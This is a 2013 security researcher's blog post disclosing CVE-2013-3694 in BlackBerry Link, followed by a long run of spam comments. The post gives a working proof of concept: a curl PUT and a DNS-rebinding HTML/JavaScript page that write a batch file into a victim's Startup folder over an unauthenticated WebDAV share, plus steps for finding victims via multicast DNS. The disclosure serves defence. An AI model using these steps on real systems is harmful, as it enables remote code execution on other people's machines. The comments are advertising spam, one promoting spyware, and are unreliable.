Tuesday, November 12, 2013

QNX

I remember being blown away by the QNX 1.44M demo as a teenager, it had a really big impact on me. At one time, I had even configured fvwm to look like QNX Photon. Here is a real screenshot of my desktop from May 2004 (an old configuration file of mine is still on the fvwm site):




Curious about what RIM have been doing with QNX since the acquisition, I bought a BlackBerry Q10.


If you connect a pristine BlackBerry 10 device to a computer, it will identify itself as a SCSI CD-ROM, and attempt to autoplay the installation of BlackBerry Link.


$ lsusb -d 0x0FCA:
Bus 002 Device 006: ID 0fca:8020 Research In Motion, Ltd.
$ cdrecord --devices
-------------------------------------------------------------------------
0  dev='/dev/sg1' rwrw-- : 'RIM' 'PlayBook CD'
-------------------------------------------------------------------------
$ isoinfo -l -i /dev/sr0

Directory listing of /
d---------   0    0    0            2048 Dec 19 2012 [     21 02]  .
d---------   0    0    0            2048 Dec 19 2012 [     21 02]  ..
----------   0    0    0              72 Dec 19 2012 [     28 00]  AUTORUN.INF
d---------   0    0    0            2048 Dec 19 2012 [     22 02]  BACKGROUND
----------   0    0    0           38198 Dec 19 2012 [     29 00]  BLACKBERRY LINK INSTALLATI.RTF
d---------   0    0    0            2048 Dec 19 2012 [     23 02]  DRIVERS
----------   0    0    0           95326 Dec 19 2012 [  19546 00]  README.RTF
----------   0    0    0        58251649 Dec 19 2012 [  19593 00]  START.DMG
----------   0    0    0          432808 Dec 19 2012 [     48 00]  START.EXE

Directory listing of /BACKGROUND/
d---------   0    0    0            2048 Dec 19 2012 [     22 02]  .
d---------   0    0    0            2048 Dec 19 2012 [     21 02]  ..
----------   0    0    0            5655 Dec 19 2012 [  48037 00]  BACKGROUND.PNG

Directory listing of /DRIVERS/
d---------   0    0    0            2048 Dec 19 2012 [     23 02]  .
d---------   0    0    0            2048 Dec 19 2012 [     21 02]  ..
----------   0    0    0        36311440 Dec 19 2012 [    260 00]  BLACKBERRYDEVICEMANAGER.EXE
----------   0    0    0         2038440 Dec 19 2012 [  17991 00]  BLACKBERRYLAUNCHER.EXE
----------   0    0    0           83032 Dec 19 2012 [  18987 00]  SETUP.EXE
----------   0    0    0              10 Dec 19 2012 [  19028 00]  VERSION.TXT
$ isoinfo -x /AUTORUN.INF -i /dev/sr0
[AutoRun]
shellexecute=start.exe
icon=start.exe
label=BlackBerry CD


BlackBerry Link is the synchronization and management software for BlackBerry 10, and I couldn't help notice it immediately spawns an nginx process after installation.




Locating the nginx configuration, I found it’s being used as a WebDAV server, listening on an IPv6 address I don't recognise. It appears to be serving my %APPDATA% directory with no access control or authentication.


$ cat nginx.conf
...
       server {
               listen [fd0e:454e:f025:58dd:30e9:d752:1223:9cbf]:8080 default_server;
               server_name rimdav;
               location  / {
                       folder_config;
               }


...
               dav_access all:rw;


$ netstat -p TCPv6 -a
Active Connections


 Proto  Local Address          Foreign Address        State
 TCP    [::]:135               WIN-DBVU5A9QFHT:0      LISTENING
 TCP    [::]:445               WIN-DBVU5A9QFHT:0      LISTENING
 TCP    [::]:1025              WIN-DBVU5A9QFHT:0      LISTENING
 TCP    [::]:1026              WIN-DBVU5A9QFHT:0      LISTENING
 TCP    [::]:1027              WIN-DBVU5A9QFHT:0      LISTENING
 TCP    [::]:1029              WIN-DBVU5A9QFHT:0      LISTENING
 TCP    [::]:1032              WIN-DBVU5A9QFHT:0      LISTENING
 TCP    [::]:1047              WIN-DBVU5A9QFHT:0      LISTENING
 TCP    [::1]:1040             WIN-DBVU5A9QFHT:0      LISTENING
 TCP    [::1]:1040             WIN-DBVU5A9QFHT:1049   ESTABLISHED
 TCP    [::1]:1049             WIN-DBVU5A9QFHT:1040   ESTABLISHED
 TCP    [fd0e:454e:f025:58dd:30e9:d752:1223:9cbf]:8080  WIN-DBVU5A9QFHT:0      LISTENING
$ curl -g -X PUT --data "calc.exe" "http://[fd0e:454e:f025:58dd:30e9:d752:1223:9cbf]:8080/Start%20Menu/Programs/Startup/exploit.bat"


This looks wrong for multiple reasons. Apart from breaking the NT security model, the address is published in multicast DNS, so everyone on the network can see it.


The exploit is simple, you use DNS rebinding to get permission to XMLHttpRequest to the WebDAV share, then you can read or write anywhere relative to a victims %APPDATA% directory.


I wrote a quick IPv6 rebinding nameserver to test it. The idea is to just extract two AAAA records from the query labels, then return one at random with a very short (1 second) TTL. The attack will work on IPv4 networks as well, where you switch between returning 1 answer and 0 answers for A queries, but I haven't implemented A record support.


It works like this:


$ host aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us
aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us has IPv6 address aabb:ccdd:eeff:aabb:ccdd:eeff:aabb:ccdd
$ host aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us
aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us has IPv6 address aabb:ccdd:eeff:aabb:ccdd:eeff:aabb:ccdd
$ host aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us
aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us has IPv6 address 1122:3344:5566:7788:99aa:1122:3344:5566
$ host aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us
aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us has IPv6 address aabb:ccdd:eeff:aabb:ccdd:eeff:aabb:ccdd
$ host aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us
aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us has IPv6 address 1122:3344:5566:7788:99aa:1122:3344:5566


As you can see, it returns a random address specified in the query labels, switching between a host you control and a host you don’t.


So lets search for a victim on my network, you can use dig to query the multicast address 224.0.0.251 on port 5353 or avahi-browse if you have it:


$ avahi-browse -r -t _bp2p._tcp
+   eth0 IPv4 webdav_B309F0A0D86BA5EF_7846FB91C6A398A5      _bp2p._tcp           local
+   eth0 IPv4 Friendly_DA52877F19217E9B_7A0D69D13ECAE391    _bp2p._tcp           local
=   eth0 IPv4 webdav_B309F0A0D86BA5EF_7846FB91C6A398A5      _bp2p._tcp           local
  hostname = [3c222e49b3165fda656214723f757f.local]
  address = [fd3c:222e:49b3:165f:da65:6214:723f:757f]
  port = [8080]
  txt = []


Then I start an http server on my machine on a matching port:


$ python
Python 2.7.3 (default, Sep 26 2013, 20:03:06)
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import socket
>>> from BaseHTTPServer import HTTPServer
>>> from SimpleHTTPServer import SimpleHTTPRequestHandler
>>>
>>> class HTTPServerV6(HTTPServer):
...  address_family = socket.AF_INET6
...
>>> HTTPServerV6(('::', 8080), SimpleHTTPRequestHandler).serve_forever()


I send the victim a link to a page that reloads http://aabbccddeeffaabbccddeeffaabbccdd.112233445566778899aa112233445566.rbndr.us:8080 in an iframe until I get the server I control, and then return something like this:


<html>
<head></head>
<body>
<h1>Please Wait...</h1>

<script>
   // Where you want to write to on victim, relative to %APPDATA%.
   var path   = "/Start%20Menu/Programs/Startup/exploit.bat";

   // What you want to write there.
   var data   = "calc.exe";

   function sendRequest()
   {
       var xhr = new XMLHttpRequest();
       xhr.open("PUT", document.location.origin + path, false);
       xhr.send(data);
   }

   setInterval(sendRequest, 1000);
</script>
</body>
</html>


After a few seconds, the address should rebind and the browser will PUT the batch file into their Startup directory, I verified this works with the latest BlackBerry Link on Windows 7.


This vulnerability is CVE-2013-3694, which RIM are scheduled to resolve today.

46 comments:

murali krishna said...

I am glad to read this post, its an interesting one. I am always searching for quality

posts and articles and this is what I found here, I hope you will be adding more in future

Neemu NA said...

Thanks for sharing useful information article ,Hi We at Colan Infotech Private Limited a
Mobile application development company in chennai,
is Situated in US and India, will provide you best service in
enterprise mobile app development company .
and Colan Infotech has a group of exceedingly dedicated, inventive and creative experts with an energy for delivering exciting , helpful and stylish Web and Mobile Applications, We work with customers in a wide variety of sectors.
We design all of our websites and applications using the responsive web design approach. Our talented team can handle all the aspects of mobility so we are rated as best service provider in
Mobile apps development companies in chennai.

We solidly trust that our customers start things out and there is not a viable alternative for quality of service.
We offer custom services to a wide range of industries by exceeding our client’s expectations. You can even interact directly with the team regarding your project, just as you would with your in-house team. we always desire to solicit our customer's fruitful experience with us, we are the top notch
Mobile App Development Company in chennai
and mobile app development companies in Bangalore. We can provide best
mobile app development chennai .
We can provide cutting edge technology services in
Mobile application development in chennai.
Reach us for mobile app development chennai or just call us for best
mobile app developers in chennai

Sharon Sandy said...


Thanks for posting useful information.You have provided an nice article, Thank you very much for this one. And i hope this will be useful for many people.. and i am waiting for your next post keep on updating these kinds of knowledgeable things...Really it was an awesome article...very interesting to read..please sharing like this information......
Web Development Company

sunitha vishnu said...

Thank you for your post. This is excellent information. It is amazing and wonderful to visit your site.
Android training in chennai
Ios training in chennai

sunitha vishnu said...
This comment has been removed by the author.
Karthika Shree said...

I just see the post i am so happy to the communication science post of information's.So I have really enjoyed and reading your blogs for these posts.Any way I’ll be replay for your great thinks and I hope you post again soon...
Java Training in Chennai

Logu christy said...

All are saying the same thing repeatedly, but in your blog I had a chance to get some useful and unique information, I love your writing style very much, I would like to suggest your blog in my dude circle, so keep on updates…
Dot Net Training in Chennai | Java Training in chennai

Freddie King said...

Thank you for taking the time and sharing this information with us. It was indeed very helpful and insightful while being straight forward and to the point.
www.mcdonaldsgutscheine.net | www.startlr.com | www.saludlimpia.com

Tom McDonald said...

Great post, Thanks a lot for the kind of perfect topic I have not a lot of information about it but I have got an extra unique info in your unique post. eCommerce Inventory Management

selva raj said...

Excellent blog for vulnerability ,thanks for sharing...
Best Android Training in chennai

reginald surict said...

Nice stuff. You may also visit this page to learn the steps of mspy install.

Unknown said...

Sas Training Institute in Noida-Webtrackker is the best sas training institute in noida. If you are search training institute in noida than webtrackker is the best option for you. SAS has the advantages of a long history, common use of biostatists and a wide range of statistical procedures. Data transfer is very powerful for manipulating data, but it has some limitations.
PHP Training Institute in Noida
Sap Training Institute in Noida
Hadoop Training Institute in Noida
Oracle Training Institute in Noida
Linux Training Institute in Noida
Dot net Training Institute in Noida
Salesforce training institute in noida
Java training institute in noida

sunitha vishnu said...

Really it was an awesome article...very interesting to read..You have provided an nice article....Thanks for sharing..
Android Training in Chennai
Ios Training in Chennai

Dexus Media said...

nice article..its amazing...If you Are looking Best Digital Marketing Company in jaipur,
SEO services in jaipur,
website designer in jaipur
website designer in jodhpur

Rajesh said...

Great post realyy usefukle

Hadoop training in chennai
ETL Testing training in chennai
SAP MM training in chennai
Informatica training in chennai
Mainframe training in chennai
SAP SD training in chennai

Richard Majece said...
This comment has been removed by the author.
Richard Majece said...

All these programs are very useful even for me (I am a writer, by the way). For example, I always read https://essaydragon.com/blog/writers-block when I have writer's block.

aravindsai said...

Great posting with useful topics.Thank you.
Abinitio Online Training | Hadoop Online Training | Cognos Online Training

aravindsai said...

Your blog is really interested.Please keep sharing.
PHP Online Training | Pega Online Training | Oracle Soa Online Training

Upshot Tech said...

Best Training institute in bangalore
java training institute in bangalore
digital marketing training in bangalore
python training in bangalore
aws training in bangalore
devops training institutes in bangalore

Rohit Chauhan said...

thank you for this info bro also check this Stockx discount Code

g2a discount code

Rilon Welding Coimbatore said...

Wow Very Nice !! Article providing here very nice information am getting from your website.. very nice information am getting from your website.. Again Very Nice

ciit noida said...

CIITN Noida provides Best java training in noida based on current industry standards that helps attendees to secure placements in their dream jobs at MNCs.The curriculum of our Java training institute in Noida is designed in a way to make sure that our students are not just able to understand the important concepts of the programming language but are also able to apply the knowledge in a practical way.

Java is inescapable, stopping meters, open transportation passes, ATMs, charge cards and TVs wherever Java is utilized.
What's more, that is the reason Well-prepared, profoundly gifted Java experts are high sought after.

If you wanna best java training, java industrial training, java summer training, core java training in noida, then join CIITN Noida.

ijazz jazz said...

Some us know all relating to the compelling medium you present powerful steps on this.Advanced Selenium Training in Chennai

Bee Yes said...

Fantastic Article ! Thanks for sharing this Lovely Post !!

Malar Raja said...

Thanks for sharing your blog of information.Really a awesome post.keep on blogging.
Regards
QTP Training in Chennai | Java Training in Chennai | Python Training in Chennai

Ishu Sathya said...

This idea is mind blowing. I think everyone should know such information like you have described on this post. Thank you for sharing this explanation.Your final conclusion was good

JAVA J2EE Training in Chennai
JAVA J2EE Training Institutes in Chennai

Anoushka Sakthi said...

Very true and inspiring article. I strongly believe all your points. I also learnt a lot from your post. Cheers and thank you for the clear path
Best Hadoop Training in Chennai
Best hadoop training institute in chennai

Suba said...

Superb information, as always. After reading this one I really got refreshing and fantastic feeling! This is also a great and encouraging post.
Best DOT NET Training institute in Chennai
DOT NET Training Chennai

prachi sara said...

Appreciation for really being thoughtful and also for deciding on certain marvelous guides most people really want to be aware of.
amazon-web-services-training-in-bangalore

big-data-hadoop-training-institute-in-bangalore

Mirnalini Sathya said...

Great website and content of your website is really awesome.
cloud computing training centers in chennai
cloud computing training institutes in chennai

Sakthi Murugan said...

I found your post while searching for some related information on blog search... Its a great blog, keep posting and update the information.
Digital Marketing Training
Digital marketing Training institute in chennai

vishnu said...

Thank you for sharing this information.

Embedded system Training in Chennai | Embedded course in chennai

Anoushka Sakthi said...

I am always searching online for articles that can help. There is obviously a lot to know about this. I think you made some good points.
Best software testing training institute in chennai
Software testing courses in chennai

Coimbatore Ooty Taxi said...

Wonderful ! Thanks for Sharing this article keep update this kind of nice articles ..

rohit pal said...




Webtrackker is one only IT company who will provide you best class training with real time working on marketing from last 4 to 8 Years Experience Employee. We make you like a strong technically sound employee with our best class training.





Best SAS Training Institute in delhi

SAS Training in Delhi

SAS Training center in Delhi

Best Sap Training Institute in delhi

Best Sap Training center in delhi


Sap Training in delhi

Best Software Testing Training Institute in delhi

Software Testing Training in delhi

Software Testing Training center in delhi


Best Salesforce Training Institute in delhi


Salesforce Training in delhi

Salesforce Training center in delhi

Best Python Training Institute in delhi

Python Training in delhi

Best Python Training center in delhi

Best Android Training Institute In delhi

Android Training In delhi

best Android Training center In delhi

rajatwebtrackker said...

Hello friends, my name is Rajat and I work as the head of digital marketing in Delhi. I am affiliated with many MNC’s Software developers. If you are talking about the best educational institution in Delhi,Webtrackker help me get the best educational institute in Delhi.we are you offering some best services in our institute.with 100% job offers are available .


Best Php Training Institute in Delhi
Php Training in delhi
php Training center in delhi

Best Java Training Institute in delhi
Best Java Training in delhi
java Training center in delhi

linux Training center in delhi
Best linux Training Institute in Delhi
linux Training in delhi

Web Designing Training center in delhi
Best Web Designing Training institute in delhi
Web Designing Training in delhi

Oracle Training Institute in delhi
Oracle Training in Delhi
Oracle Training center in Delhi

blue prism Training Institute in delhi
blue prism Training in Delhi
blue prism Training center in Delhi

Automation Anywhere Training center In delhi
Automation Anywhere Training Institute In delhi

rpa Training Institute in delhi
rpa Training in Delhi
rpa Training center in Delhi

hadoop Training center in delhi
Best hadoop Training institute in delhi
hadoop Training in delhi

rajatwebtrackker said...

Best Php Training Institute in Delhi
Best Java Training Institute in delhi
linux Training center in delhi
Web Designing Training center in delhi
Oracle Training Institute in delhi
blue prism Training Institute in delhi
Automation Anywhere Training center In delhi
rpa Training Institute in delhi
hadoop Training center in delhi

guys if you make your carrier and do what you want to do in your life so webtrackker is the best option to take your carrier make large

Dida ELhaik said...


تعد شركة تركيب اثاث ايكيا بالرياض هي الشركة الرائده والاولي في كافة الاثاث من تركيب وفك ونقل وتخزين وكافة الاعمال المتعلقة بالاثاث في الرياض وكافة المناطق والمحافظات بالمملكة العربية السعودية، وقد تصدرت شركة خبراء المملكة لتكون الأولى في مجال فك ونقل وتركيب الأثاث المنزلي وايضا فك وتركيب الستائر بالرياض وهي تتميز عن باقي شركات الرياض نظرا لما تقدمة من خدمات بشكل احترافي كما انها تتميز عن غيرها بكفاءة الفنيين والامتخصصين في مجال تركيب الاثاث فلا داعي لكثرة البحث فلديك خبراء المملكة فهم فعلا خبراء ومتميزون في جميع خدماتهم المقدمة
شركة تركيب اثاث ايكيا بالرياض
فني تركيب اثاث ايكيا بالرياض
شركة تركيب ستائر بالرياض
عامل تركيب ستائر بالرياض
شركة تركيب غرف نوم بالرياض
فني تركيب غرف نوم بالرياض
شركة تركيب باركية بالرياض
شركة تركيب عفش بالرياض
ما يميز شركة تركيب نقل وتركيب اثاث بالرياض
- تعد شركة تركيب اثاث ايكيا من الشركات المفضلة لكثير من العملاء فهم من منحوها الصدارة والتميز لتميز الخدمات المقدمة لهم وهي الاولي في تركيب الاثاث لزيادة خبراتها الكبيرة لسنوات.
تتميز ايضا شركة خبراء المملكة بكبر فرق العمل المتخصصة والمدربة بمهاره وتقنية عالية كما اننا ندعم صفوفنا بصفة مستمرة من العمال والموظفين والفنيين الأكفاء والمهرة كما انها Jستقبل العمالة الفليبنية

Abhishek Bhardwaj said...

Nice Post . Thank you for this beautiful content, Keep it up. Techavera is the best Institute in Noida for all these main Courses below:-

Tally ERP 9 Training Institute in Noida.
SAP HANA training course in noida.
Angular JS Training in Noida.
PLC SCADA Training Institute in Noida.
Embedded Systems training in noida



Visit us For Quality Learning.Thank you

Henrik Fosse said...
This comment has been removed by the author.
Henrik Fosse said...
This comment has been removed by the author.
Prasanth Krishnan said...

Thanks for great post! Its gives more information.

Angularjs Training in Chennai | Web Designing Training in Chennai

blackkutty said...

Truly it was a marvelous article..very intriguing to read.You have given a decent article..Thanks to sharing..
Article Submission sites | Latest Updates | Technology

anushka sharma said...

Nice post. Keep blogging such type of posts. Python training institute in Chennai

Narmadha Raj said...

Nice Blog, Thanks for sharing this valuable one. This very useful for me and gain more information.

Regards,
Selenium Training in Chennai